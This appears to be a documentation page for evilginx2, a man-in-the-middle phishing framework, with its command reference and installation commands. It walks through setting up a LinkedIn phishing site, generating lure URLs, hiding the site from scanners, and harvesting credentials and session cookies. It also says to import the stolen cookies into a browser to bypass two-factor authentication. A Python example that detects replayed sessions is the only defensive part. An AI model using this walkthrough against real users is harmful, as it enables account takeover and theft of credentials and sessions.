
evilginx2

evilginx2 Description

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows an attacker to bypass 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality, acting as a proxy between a browser and the phished website. The present version is written entirely in Go as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Homepage: https://github.com/kgretzky/evilginx2

Author: Kuba Gretzky

License: GPLv3

evilginx2 Help

Usage:

./evilginx

Options:

  -debug
    	Enable debug output
  -developer
    	Enable developer mode (generates self-signed certificates for all hostnames)
  -p string
    	Phishlets directory path

evilginx2 Commands

general

    config : manage general configuration
 phishlets : manage phishlets configuration
  sessions : manage sessions and captured tokens with credentials
     lures : manage lures for generation of phishing urls
     clear : clears the screen

config

Shows the values of all configuration variables and allows changing them.

                            config : show all configuration variables
            config domain <domain> : set base domain for all phishlets (e.g. evilsite.com)
            config ip <ip_address> : set ip address of the current server
        config redirect_key <name> : change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)
    config verification_key <name> : change name of the verification parameter in phishing url (phishing urls will need to be regenerated)
 config verification_token <token> : change the value of the verification token (phishing urls will need to be regenerated)
         config redirect_url <url> : change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)

phishlets

Shows the status of all available phishlets and allows changing their parameters and enabled status.

                                   phishlets : show status of all available phishlets
    phishlets hostname <phishlet> <hostname> : set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)
                 phishlets enable <phishlet> : enables phishlet and requests ssl/tls certificate if needed
                phishlets disable <phishlet> : disables phishlet
                   phishlets hide <phishlet> : hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)
                 phishlets unhide <phishlet> : makes the phishing page available and reachable from the outside
 phishlets get-url <phishlet> <redirect_url> : generates phishing url with redirection on successful authentication
              phishlets get-hosts <phishlet> : generates entries for hosts file in order to use localhost for testing

sessions

Shows all captured credentials and authentication tokens. Allows viewing the full history of visits and deleting logged sessions.

             sessions : show history of all logged visits and captured credentials
        sessions <id> : show session details, including captured authentication tokens, if available
 sessions delete <id> : delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)
  sessions delete all : delete all logged sessions

lures

Shows all created lures and allows editing or deleting them.

                                       lures : show all create lures
                                  lures <id> : show details of a lure with a given <id>
                     lures create <phishlet> : creates new lure for given <phishlet>
                           lures delete <id> : deletes lure with given <id>
                            lures delete all : deletes all created lures
                 lures edit path <id> <path> : sets custom url <path> for a lure with a given <id>
 lures edit redirect_url <id> <redirect_url> : sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
         lures edit phishlet <id> <phishlet> : change the phishlet, the lure with a given <id> applies to
                 lures edit info <id> <info> : set personal information to describe a lure with a given <id> (display only)
            lures edit og_title <id> <title> : sets opengraph title that will be shown in link preview, for a lure with a given <id>
             lures edit og_desc <id> <title> : sets opengraph description that will be shown in link preview, for a lure with a given <id>
            lures edit og_image <id> <title> : sets opengraph image url that will be shown in link preview, for a lure with a given <id>
              lures edit og_url <id> <title> : sets opengraph url that will be shown in link preview, for a lure with a given <id>
          lures edit params <id> <key=value> : adds, edits or removes custom parameters (used in javascript injections), for a lure with a given <id>

evilginx2 Usage Example

To get up and running, you first need to do some setting up.

At this point I assume you've already registered a domain (let's call it yourdomain.com) and set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

In evilginx2, set up your server's domain and IP using the following commands:

config domain yourdomain.com
config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

phishlets enable linkedin

Your phishing site is now live. Decide which URL you want the victim to be redirected to on successful login, and get the phishing URL like this (the victim will be redirected to https://www.google.com):

phishlets get-url linkedin https://www.google.com

Running phishlets will only respond to tokenized links, so any scanners that scan your main domain will be redirected to the URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use the phishlets hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

sessions <id>

The captured session cookie can be copied and imported into the Chrome browser using the EditThisCookie extension.

Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.
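Seen from the side of the application being impersonated, the cookie import described above shows up as one session being presented by a second client. The following is an added example, not code from the original page or from the evilginx2 project, that flags such sessions in access records. The log format, field names and severity rule are assumptions, and the sample records are constructed.

```python
from datetime import datetime

# Constructed sample records (not from the page): timestamp, session id
# (log a hash of the token, never the token itself), client IP, User-Agent.
SAMPLE_LOG = """\
2024-05-01T09:00:02Z sess-a1 203.0.113.10 "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
2024-05-01T09:00:40Z sess-a1 203.0.113.10 "Mozilla/5.0 (Windows NT 10.0) Firefox/125.0"
2024-05-01T09:03:15Z sess-a1 198.51.100.77 "Mozilla/5.0 (X11; Linux x86_64) Chrome/124.0"
2024-05-01T09:10:00Z sess-b2 192.0.2.44 "Mozilla/5.0 (Macintosh) Safari/17.4"
2024-05-01T09:45:00Z sess-b2 192.0.2.91 "Mozilla/5.0 (Macintosh) Safari/17.4"
"""

def parse_line(line):
    """Split one record into (datetime, session_id, ip, user_agent)."""
    ts, sid, ip, ua = line.split(" ", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), sid, ip, ua.strip('"')

def find_replayed_sessions(log_text):
    """Return one alert per session that a second client presented.

    Assumed rule: a session belongs to the (IP, User-Agent) that first used
    it. A later request where both differ is 'high' (cookie moved to another
    browser and network); any other mismatch (roaming, VPN) is 'low'.
    """
    origin, alerts = {}, {}
    for line in filter(None, map(str.strip, log_text.splitlines())):
        ts, sid, ip, ua = parse_line(line)
        first_ts, first_ip, first_ua = origin.setdefault(sid, (ts, ip, ua))
        if (ip, ua) == (first_ip, first_ua):
            continue
        severity = "high" if ip != first_ip and ua != first_ua else "low"
        if sid in alerts and (alerts[sid]["severity"] == "high" or severity == "low"):
            continue  # keep the earliest alert unless it can be upgraded to high
        alerts[sid] = {
            "session": sid,
            "severity": severity,
            "origin_ip": first_ip,
            "seen_ip": ip,
            "seconds_after_first_use": int((ts - first_ts).total_seconds()),
        }
    return sorted(alerts.values(), key=lambda a: a["session"])

if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_LOG):
        print(alert)
```

A 'high' alert is a reasonable trigger for invalidating the session and forcing re-authentication; 'low' alerts are better used as one input to a risk score.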

How to install evilginx2

Installation on Kali Linux

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx

Installation on Linux (Debian, Mint, Ubuntu)

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx
